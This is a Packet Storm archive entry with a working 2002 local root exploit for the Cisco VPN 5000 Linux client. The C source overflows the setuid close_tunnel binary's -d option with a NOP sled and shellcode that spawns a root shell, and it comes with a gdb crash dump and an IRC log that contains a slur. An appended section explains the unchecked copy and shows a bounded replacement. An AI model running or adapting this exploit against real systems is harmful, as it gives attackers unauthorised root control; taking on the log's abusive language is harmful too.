
ES-cisco-vpn.c
Posted Sep 19, 2002
Authored by electronicsouls

Cisco VPN 5000 Linux client version 5.1.5 local root exploit that uses the close_tunnel binary.

tags | exploit, local, root
systems | cisco, linux
SHA-256 | ace076932d0664c2056944cff5c03f7c2d82699188fdeea7f90ecefb6ae7e279

/*
 * [ElectronicSouls] Local Root Exploit for Cisco VPN 5000 Client
 * (C) BrainStorm - 2002
 *
 * Program received signal SIGSEGV, Segmentation fault.
 * 0x41414141 in ?? ()
 * (gdb) i r
 * eax 0xffffffff -1
 * ecx 0x0 0
 * edx 0x0 0
 * ebx 0x4015c154 1075167572
 * esp 0xbfffdb70 0xbfffdb70
 * ebp 0x41414141 0x41414141
 * esi 0x400168e4 1073834212
 * edi 0xbfffdbf4 -1073751052
 * eip 0x41414141 0x41414141
 * eflags 0x10286 66182
 *
 * As you can see, %eip got filled with 0x41 ;)
 *
 * Tested:
 * - on release 5.1.5
 * - from package: vpn-5000-linux-5.1.5-des-k8.tar.Z
 * - system RedHat Linux 7.2 / x86
 *
 * Bug Information:
 * There are multiple unchecked buffers in the code which allow
 * arbitrary code to be executed with root privileges. This is due to
 * insufficient bounds checking; the result is a classic command-line
 * buffer overflow condition. This should be exploitable on Linux/Solaris.
 *
 * IRC:
 * <BrainStor> a standard cmd line buffer overflow in the -d option
 * <BrainStor> close_tunnel is set +s by default
 * <v0id> tsk tsk tsk, cisco making errors like that
 * <v0id> fucking stupid cunts
 * <BrainStor> yea
 * <BrainStor> it's unbelievable
 * <v0id> man, standard buffer overflow should be practically non existent these days
 * <v0id> oh well
 * <BrainStor> indeed
 * <BrainStor> but it's good tho ;)
 */

#include <stdio.h>
#include <stdlib.h>   /* atoi() */
#include <string.h>   /* strlen(), memcpy() */
#include <unistd.h>   /* execl() */

#define B 2504
#define N 0x90
#define R 0xbfffefc0              // may need to be changed depending on the distro/os..
#define BIN "/bin/close_tunnel"   // you maybe want to change this too =P
                                  // /usr/local/bin/close_tunnel or so..

char shell[] = "HELO"                                     // yes this is a valid x86 instruction ;)
    "\x31\xdb\x89\xd8\xb0\x17\xcd\x80"                    // setuid();
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
    "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
    "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char **argv)   /* was "char **argv[]", which is the wrong type for argv */
{
    int ret, off, es;
    char bof[B];

    printf("\n\n");
    printf(" [ElectronicSouls] \n");
    printf(" Cisco VPN 5000 client exploit \n");
    printf(" (C) BrainStorm \n\n");

    if (argc < 3) {                 /* no offset/address given: use the defaults */
        off = 0;
        ret = R;
    } else {
        off = atoi(argv[1]);
        ret = atoi(argv[2]) + off;
    }

    /* fill the whole buffer with copies of the return address... */
    for (es = 0; es < B; es += 4)
        *(long *) &bof[es] = ret;

    printf("+ return address: 0x%x \n", (unsigned) ret);

    /* ...then overwrite the front with NOPs followed by the shellcode,
       leaving the last 36 bytes as return-address copies */
    for (es = 0; es < (B - strlen(shell) - 36); ++es)
        *(bof + es) = N;

    memcpy(bof + es, shell, strlen(shell));

    printf("+ overflowing the buffer..\n\n\n");

    execl(BIN, BIN, "-d", bof, (char *) NULL);   // b00m!

    return 0;
}
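The root cause described in the header is an argument copied into a fixed stack buffer with no length check. The following is an added example, not part of the ElectronicSouls exploit or of Cisco's close_tunnel code: a hypothetical "-d" option handler written the unsafe way beside a bounded version, with a helper that reports whether an argument of a given length (the exploit uses 2504 bytes of filler) is accepted. The buffer size DEVNAME_MAX is an assumption.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEVNAME_MAX 64  /* assumed size of the option's stack buffer */

/* Unsafe pattern the advisory describes: strcpy() of argv text into a
 * fixed stack buffer with no length check. An argument longer than the
 * buffer overwrites the saved frame pointer and return address, which is
 * why the gdb dump above shows %ebp and %eip as 0x41414141. Shown for
 * contrast only; nothing here calls it. */
void handle_d_unsafe(const char *arg)
{
    char dev[DEVNAME_MAX];
    strcpy(dev, arg);
    printf("closing tunnel on %s\n", dev);
}

/* Bounded replacement: refuse anything that does not fit, copy only what
 * was measured, and always NUL-terminate. Returns 0 on success, -1 if
 * the argument is missing or too long. */
int handle_d_safe(const char *arg, char *dev, size_t devlen)
{
    const char *end;
    size_t n;
    if (arg == NULL || devlen == 0)
        return -1;
    end = memchr(arg, '\0', devlen);   /* look for the terminator within devlen */
    if (end == NULL)                   /* no NUL in the first devlen bytes: too long */
        return -1;
    n = (size_t)(end - arg);
    memcpy(dev, arg, n + 1);           /* includes the terminator */
    return 0;
}

/* Self-check helper: build an argument of `len` 'A' bytes (the same filler
 * the exploit uses) and report whether handle_d_safe() accepts it. */
int accepts_arg_of_length(size_t len)
{
    char dev[DEVNAME_MAX];
    char *arg = malloc(len + 1);
    int rc;
    if (arg == NULL)
        return -1;
    memset(arg, 'A', len);
    arg[len] = '\0';
    rc = handle_d_safe(arg, dev, sizeof dev);
    free(arg);
    return rc == 0;
}
```

With a 64-byte buffer the bounded handler accepts arguments of up to 63 bytes and rejects the 2504-byte argument the exploit passes, instead of overrunning the frame.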

© 2024 Packet Storm. All rights reserved.